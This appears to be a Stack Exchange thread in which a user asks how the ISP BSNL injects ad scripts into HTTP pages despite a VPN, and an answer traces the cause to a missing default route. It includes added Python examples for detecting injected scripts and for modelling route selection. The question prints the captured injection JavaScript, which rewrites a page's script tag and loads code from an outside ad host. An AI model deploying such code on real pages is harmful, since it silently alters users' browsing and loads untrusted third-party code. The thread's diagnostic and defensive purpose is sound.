
I'm using the Sophos SSL VPN Client, and my ISP is BSNL. Whenever I connect the VPN and browse any HTTP (non-secured) website, ads get injected into the JS script file. But when I disconnect the VPN and browse any non-secured website, the script injection doesn't happen and the ads won't display.

But my question is: how does my ISP, BSNL, recognize that I'm browsing a non-secured website after I've connected to the secure tunnel, so that all the routed network traffic will be encrypted? And how do they use a Network Proxy Analyzer to inject the script?

Here you will find the log when connected to VPN

OpenVPN 2.3.8 i686-w64-mingw32 [SSL (OpenSSL)] [LZO] [IPv6] built on Jul  3 2017
library versions: OpenSSL 1.0.2l  25 May 2017, LZO 2.09

Data Channel Encrypt: Cipher 'AES-128-CBC' initialized with 128 bit key
Data Channel Encrypt: Using 256 bit message hash 'SHA256' for HMAC authentication
Data Channel Decrypt: Cipher 'AES-128-CBC' initialized with 128 bit key
Data Channel Decrypt: Using 256 bit message hash 'SHA256' for HMAC authentication
Control Channel: TLSv1, cipher TLSv1/SSLv3 DHE-RSA-AES256-SHA, 2048 bit RSA

Script(JS)

!function() {
    // Locate the page's own analytics.js loader among the <script> tags.
    var a = "/analytics.js"
      , r = null
      , e = document.getElementsByTagName("script")
      , i = e.length
      , n = null
      , t = Date.now()
      , s = null
      , o = 0;
    for ("/" === a.substring(0, 1) && (a = a.substring(1)),
    o = 0; o < i; o += 1)
        if (void 0 !== e[o].src && null !== e[o].src && e[o].src.indexOf(a) > -1) {
            n = o,
            r = e[o];
            break
        }
    // Fall back to the first <script> on the page if analytics.js is not present.
    void 0 !== r && null !== r || (r = document.getElementsByTagName("script")[0]),
    // Rebuild that script's URL with a timestamp cache-buster and a base64 "fingerprint" marker.
    s = r.src.indexOf("?") > -1 ? r.src + "&cb=" + t.toString() + "&fingerprint=c2VwLW5vLXJlZGlyZWN0&onIframeFlag" : r.src + "?cb=" + t.toString() + "&fingerprint=c2VwLW5vLXJlZGlyZWN0&onIframeFlag";
    try {
        // window.sarazasarazaNoti records URLs already rewritten so the same script is not processed twice.
        if (void 0 === window.sarazasarazaNoti || null === window.sarazasarazaNoti || window.sarazasarazaNoti === Array && window.sarazasarazaNoti.indexOf(r.src) < 0) {
            void 0 !== window.sarazasarazaNoti && null !== window.sarazasarazaNoti || (window.sarazasarazaNoti = new Array),
            window.sarazasarazaNoti.push(r.src);
            var c = r.parentNode
              , d = r;
            // Swap the original <script> element for one that loads the rewritten URL.
            if (r.async || r.defer || null !== n && n !== e.length - 1) {
                var w = document.createElement("script");
                w.src = s,
                c.replaceChild(w, d)
            } else
                document.write("<script type='text/javascript' src=" + s + "><\/script>"),
                c.removeChild(d)
        }
    } catch (a) {}
}();
// Second stage: once the DOM is parsed, append a <span> holding a script from a third-party host.
document.addEventListener('DOMContentLoaded', function() {
    var esp = document.createElement('span');
    var esr = document.createElement('script');
    esr.src = 'http://allashail.club/rNUma4ZKIVZiq/7257?ndn=ch2';
    esr.type = 'text/javascript';
    esp.appendChild(esr);
    document.body.appendChild(esp);
}, false);

HTML (Script Injection)

<html>
   <head>
      <script src="http://www.google-analytics.com/analytics.js?cb=1585885601053&amp;fingerprint=c2VwLW5vLXJlZGlyZWN0&amp;onIframeFlag"></script>
   </head>
   <body>
   <span>
      <script src="http://allashail.club/rNUma4ZKIVZiq/7257?ndn=ch2" type="text/javascript"></script>
   </span>
   </body>
</html>

OpenVPN config

client
dev tun
proto tcp
verify-x509-name "OU=Domain Control Validated, CN=*.domain.com"
route remote_host 255.255.255.255 net_gateway
resolv-retry infinite
nobind
persist-key
persist-tun
<ca>
Bag Attributes: <No Attributes>
subject=/C=BE/O=GlobalSign nv-sa/CN=XXXSSL CA - SHA256 - G2
issuer=/C=BE/O=GlobalSign nv-sa/OU=Root CA/CN=GlobalSign Root CA
-----BEGIN CERTIFICATE-----
-----END CERTIFICATE-----
-----BEGIN CERTIFICATE-----
-----END CERTIFICATE-----
</ca>
<cert>
-----BEGIN CERTIFICATE-----
-----END CERTIFICATE-----
</cert>
<key>
-----BEGIN RSA PRIVATE KEY-----
-----END RSA PRIVATE KEY-----
</key>
auth-user-pass pass.txt
cipher AES-128-CBC
auth SHA256
comp-lzo no
route-delay 4
verb 3
reneg-sec 86400

remote xxx.xx.xxx.xx 8443
remote xxx.xx.xxx.xx 8443
remote xxx.xx.xxx.xx 8443
remote xxx.xxx.xxx.xx 8443
remote xxx.xxx.xxx.xx 8443

To establish a secure connection, how should I configure my Sophos SSL VPN Client using the OpenVPN protocol?
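The two tags in the HTML above are the whole footprint of the injection: the page's own analytics.js URL rewritten with a cache-buster and a base64 fingerprint, plus a script from a host the page never referenced. As an added example that is not code from the question, here is a small Python check that extracts every <script src> from a page body, flags hosts outside an assumed allow-list, notes whether each loads over plain HTTP, and decodes the fingerprint parameter (c2VwLW5vLXJlZGlyZWN0 is base64 for "sep-no-redirect"). The sample HTML is constructed from the tags shown in the question; the allow-list is an assumption for the demo.

```python
import base64
from html.parser import HTMLParser
from urllib.parse import urlsplit, parse_qs

# Constructed sample input: the two <script> tags the question shows after
# injection, wrapped in a minimal page. Not a live capture.
SAMPLE_HTML = """<html><head>
<script src="http://www.google-analytics.com/analytics.js?cb=1585885601053&amp;fingerprint=c2VwLW5vLXJlZGlyZWN0&amp;onIframeFlag"></script>
</head><body>
<span><script src="http://allashail.club/rNUma4ZKIVZiq/7257?ndn=ch2" type="text/javascript"></script></span>
</body></html>"""

# Hosts this page is expected to load scripts from (an assumption for the demo;
# in practice take it from a clean fetch over HTTPS or from the site owner).
EXPECTED_SCRIPT_HOSTS = {"www.google-analytics.com"}


class ScriptCollector(HTMLParser):
    """Collect the src of every <script> tag; HTMLParser unescapes &amp; for us."""

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            for name, value in attrs:
                if name == "src" and value:
                    self.srcs.append(value)


def decode_fingerprint(value):
    """Base64-decode a query value; return None if it is not clean base64 text."""
    try:
        raw = base64.b64decode(value + "=" * (-len(value) % 4), validate=True)
        return raw.decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return None


def audit_scripts(html, expected_hosts=EXPECTED_SCRIPT_HOSTS):
    """One finding per script src: host, whether it is outside the expected set,
    whether it loads over plain HTTP, the cb value and any decoded fingerprint."""
    collector = ScriptCollector()
    collector.feed(html)
    findings = []
    for src in collector.srcs:
        parts = urlsplit(src)
        query = parse_qs(parts.query, keep_blank_values=True)
        findings.append({
            "src": src,
            "host": parts.hostname,
            "plaintext": parts.scheme == "http",
            "unexpected_host": parts.hostname not in expected_hosts,
            "cache_buster": query.get("cb", [None])[0],
            "fingerprint": decode_fingerprint(query["fingerprint"][0])
            if "fingerprint" in query else None,
        })
    return findings


def suspicious(findings):
    """Findings worth alerting on: third-party hosts, or first-party scripts
    whose URL has been rewritten with an injection marker."""
    return [f for f in findings if f["unexpected_host"] or f["fingerprint"] is not None]


if __name__ == "__main__":
    for finding in suspicious(audit_scripts(SAMPLE_HTML)):
        print(finding)
```

Both tags come back as suspicious: the first-party one because its URL carries the fingerprint marker, the second because allashail.club is not an expected host. Comparing the same page fetched over the tunnel and directly, with this check run on each, separates "the ISP is modifying HTTP" from "the page itself changed".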

  • Are you sure it's your ISP injecting stuff when you are connected across the VPN? They should not be able to do this if the VPN is set up correctly... If your VPN provider is injecting this, though, that would make sense. – davidgo Apr 04 '20 at 09:41
  • Let me just narrow our discussion: it's the ISP who are injecting scripts via some kind of proxy analyzer software. Whenever any request is made to a non-HTTPS site having a single `.js`, they tamper with it and inject it into the HTML. It is definitely not the VPN providers. Even in some organizations without a VPN they had injected. @davidgo – Nɪsʜᴀɴᴛʜ ॐ Apr 04 '20 at 09:50
  • Assuming that the connection is (a) encrypted, (b) routes everything - including DNS through it (c) the encryption is not compromised and (d) bad information is not cached it is impossible for your ISP to do this. What is left is to find out which of these factors is not in place. Can you show your routing table and dhcp lease info (to see the name server in use) to rule out the most likely weaknesses? – davidgo Apr 04 '20 at 18:47
  • [Click Here](https://pastebin.com/VFzWy3X0) @davidgo – Nɪsʜᴀɴᴛʜ ॐ Apr 05 '20 at 04:09

1 Answer


...my question is how does my ISP BSNL recognizes that I'm browsing a non-secured website after connecting to the secure tunnel...

Looking at your routing table (after the VPN is up) the traffic to the wider Internet is still going via your ISP, not across your tunnel, which is why your ISP can intercept it.

If you look, your "default gateway" (the line 0.0.0.0 netmask 0.0.0.0 with a gateway of 192.168.43.1) is the same on both line 13 (before the VPN) and line 53 (after the VPN). The VPN does appear to be adding routes, but all these routes are very specific and not Internet routable. For example there is no more specific route for 8.8.8.8, or most other Internet addresses. It looks like your VPN provider is either not pushing a default route to you, or your side is not accepting it, and this is the core of your problem.

There are a number of ways this can be fixed. One would be to add the following 2 lines to your configuration file and restart your VPN:

  route 0.0.0.0 128.0.0.0
  route 128.0.0.0 128.0.0.0

These 2 lines will match all IPv4 space (0.0.0.0 - 127.255.255.255 and 128.0.0.0 - 255.255.255.255) and the combined effect is equivalent to adding a default gateway that is preferred to the existing one as it is made up of more specific routes.

If this is successful, the 2 new routes will be added to your routing table when you make a VPN connection, and will be removed when it stops.

(As things stand you do not have an IPv6 default route, but if your system were to change such that you did, you would need to update your VPN such that it works with IPv6 as well.)

davidgo
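To see why the two half-routes win over the unchanged default gateway, here is an added example that is not part of the answer: a Python model of longest-prefix-match route selection over a table built like the one the answer describes. The ISP gateway 192.168.43.1 is taken from the answer; the tunnel gateway, the corporate subnet and the server address 203.0.113.10 (standing in for the masked remote) are assumptions for the demo. parse_route_lines also shows what the typo mentioned in the comments does: a malformed second line installs nothing, so only 0.0.0.0/1 goes through the tunnel and the upper half of the address space still leaves via the ISP.

```python
import ipaddress


def lookup(routes, dst):
    """Longest-prefix match over (prefix, gateway, interface) tuples.
    Returns the winning tuple, or None if no route covers dst (for instance an
    IPv6 destination against an IPv4-only table)."""
    addr = ipaddress.ip_address(dst)
    best = None
    for prefix, gateway, iface in routes:
        net = ipaddress.ip_network(prefix)
        if addr in net and (best is None or net.prefixlen > best[0].prefixlen):
            best = (net, gateway, iface)
    return None if best is None else (str(best[0]), best[1], best[2])


def egress(routes, dst):
    """Interface a packet to dst would leave on, or None."""
    hit = lookup(routes, dst)
    return None if hit is None else hit[2]


def parse_route_lines(lines, tun_gw, iface="tun"):
    """Turn OpenVPN-style 'route <network> <netmask>' lines into table entries
    pointing at the tunnel, skipping malformed lines the way a bad line would
    simply fail to install a route."""
    entries = []
    for line in lines:
        parts = line.split()
        if len(parts) != 3 or parts[0] != "route":
            continue
        try:
            net = ipaddress.ip_network(f"{parts[1]}/{parts[2]}")
        except ValueError:
            continue  # e.g. 'route 128.0.0.0.0 128.0.0.0' (extra octet)
        entries.append((str(net), tun_gw, iface))
    return entries


ISP_GW = "192.168.43.1"      # default gateway named in the answer
TUN_GW = "10.81.234.1"       # assumed tunnel-side gateway
VPN_SERVER = "203.0.113.10"  # documentation address standing in for the masked 'remote'

# Modelled on the routing table the answer describes: ISP default route untouched,
# VPN adds only specific routes plus a host route to its server via the ISP
# (what 'route remote_host 255.255.255.255 net_gateway' in the config installs).
BEFORE = [
    ("0.0.0.0/0", ISP_GW, "wlan"),
    ("10.81.0.0/16", TUN_GW, "tun"),     # assumed corporate subnet pushed by the VPN
    (VPN_SERVER + "/32", ISP_GW, "wlan"),
]

FIX_LINES = ["route 0.0.0.0 128.0.0.0", "route 128.0.0.0 128.0.0.0"]
TYPO_LINES = ["route 0.0.0.0 128.0.0.0", "route 128.0.0.0.0 128.0.0.0"]

AFTER = BEFORE + parse_route_lines(FIX_LINES, TUN_GW)
HALF = BEFORE + parse_route_lines(TYPO_LINES, TUN_GW)

if __name__ == "__main__":
    for dst in ("8.8.8.8", "200.0.0.1", VPN_SERVER, "2001:db8::1"):
        print(dst, "before:", egress(BEFORE, dst), "after:", egress(AFTER, dst),
              "half:", egress(HALF, dst))
```

With both lines installed, 8.8.8.8 matches 0.0.0.0/1 and 200.0.0.1 matches 128.0.0.0/1, each one bit longer than 0.0.0.0/0, so they go into the tunnel; the /32 to the VPN server still beats the /1 and keeps the tunnel's own packets going out via the ISP, which is what prevents a routing loop. These two routes plus that host route are exactly what OpenVPN's redirect-gateway def1 option installs. An IPv6 destination matches nothing in this table, which is the caveat in the answer's last paragraph.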
  • Digging into this a bit (I could be wrong): it seems like Sophos VPN is used for connecting to a corporate/business network. If this is the case, depending on how it's configured, it's possible that traffic to the wider Internet will not be routed and sites will become unreachable. It also means that the corporate providing the VPN can read your traffic as if it were the ISP, and uses their bandwidth, so it may not be an ideal solution, and should be discussed with the corporate IT department. FYI, the underlying tech is OpenVPN, which is how I know the config changes to make. – davidgo Apr 05 '20 at 05:30
  • Do you mean split tunneling had been used? Completely disabled connecting to IPv6. But some of the sites pinged `Request timed out`. It normally works for Stack Exchange and Google sites. Even `duckduckgo.com` fails. As you said, after adding `route`: [check here](https://pastebin.com/yw08iYiS) – Nɪsʜᴀɴᴛʜ ॐ Apr 05 '20 at 06:04
  • Hi, do we need to add any config to the ovpn config file to boost or speed things up? And how should we add routing so that all the sites become browsable, and how does the ISP know that I'm connecting to the SSL VPN client? – Nɪsʜᴀɴᴛʜ ॐ Apr 05 '20 at 06:08
  • And [click here](https://pastebin.com/7wPQ0HPQ) is the trace route without adding the route that you specified. How come it still remains the same before and after connecting to the VPN? – Nɪsʜᴀɴᴛʜ ॐ Apr 05 '20 at 06:17
  • Is it possible to browse all the sites after adding the route and installing [DNSCrypt](https://github.com/DNSCrypt/dnscrypt-proxy/wiki/Installation-Windows)? – Nɪsʜᴀɴᴛʜ ॐ Apr 05 '20 at 06:32
  • My second route statement had a typo (an extra .0) so wasn't showing in the route table. That meant only half the routes were going through the tunnel. My guess is that those were failing, and the other half taking the wrong path direct through your ISP. – davidgo Apr 05 '20 at 09:15
  • I can't answer the rest of your questions unless I know the end goal, what the Sophos box is doing and who controls it. I have no clue where dnscrypt fits into your thinking or why. – davidgo Apr 05 '20 at 09:20
  • Let us [continue this discussion in chat](https://chat.stackexchange.com/rooms/106340/discussion-between-ns--and-davidgo). – Nɪsʜᴀɴᴛʜ ॐ Apr 05 '20 at 09:37